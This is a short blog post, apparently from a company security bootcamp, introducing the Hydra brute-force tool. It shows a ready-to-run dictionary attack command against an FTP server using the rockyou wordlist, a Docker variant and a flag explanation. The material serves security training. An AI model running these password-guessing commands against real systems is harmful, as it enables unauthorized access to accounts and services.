Hacking Tool: hydra
posted in security on • by Wouter Van SchandevijlShow how easy it would be to gain unauthorized access to a system remotely.
What
Hydra is a brute-force tool to perform dictionary attacks against protocols such as Ftp, Http(s), Cisco, Oracle, Postgres, SMTP, Telnet, SSH and many more.
vanhauser-thc/thc-hydra : hydra
How
hydra -l user -P rockyou.txt ftp://192.168.1.6 -t8 -v -I
Flags used:
-l user
: the vulnerable username-L file
: load several logins fromfile
-P file
: the wordlist fileftp//ip
: theservice://server[:PORT]
-t8
: amount of parallel attempts (default 16)-v
: verbose mode-V
: show login+pass for each attempt-d
: debug mode
-I
: ignore an existing restore file
Docker
This assumes that you have a wordlist.txt
file in your working directory.
# Display all options
docker run --rm vanhauser/hydra -h
# Map a volume with a wordlist
docker run -v $(pwd):/data --rm vanhauser/hydra -l user -P /data/wordlist.txt ftp://ip -t8 -v -I
Wordlists
Wordlists contain common passwords.
A famous one is rockyou.txt
(14M).
When
Whenever you figure out that a certain protocol and user has a weak password, it’s time to whip out Hydra! Check the Security Audit Blog during itenium’s Security Bootcamp for such clue!
Other interesting reads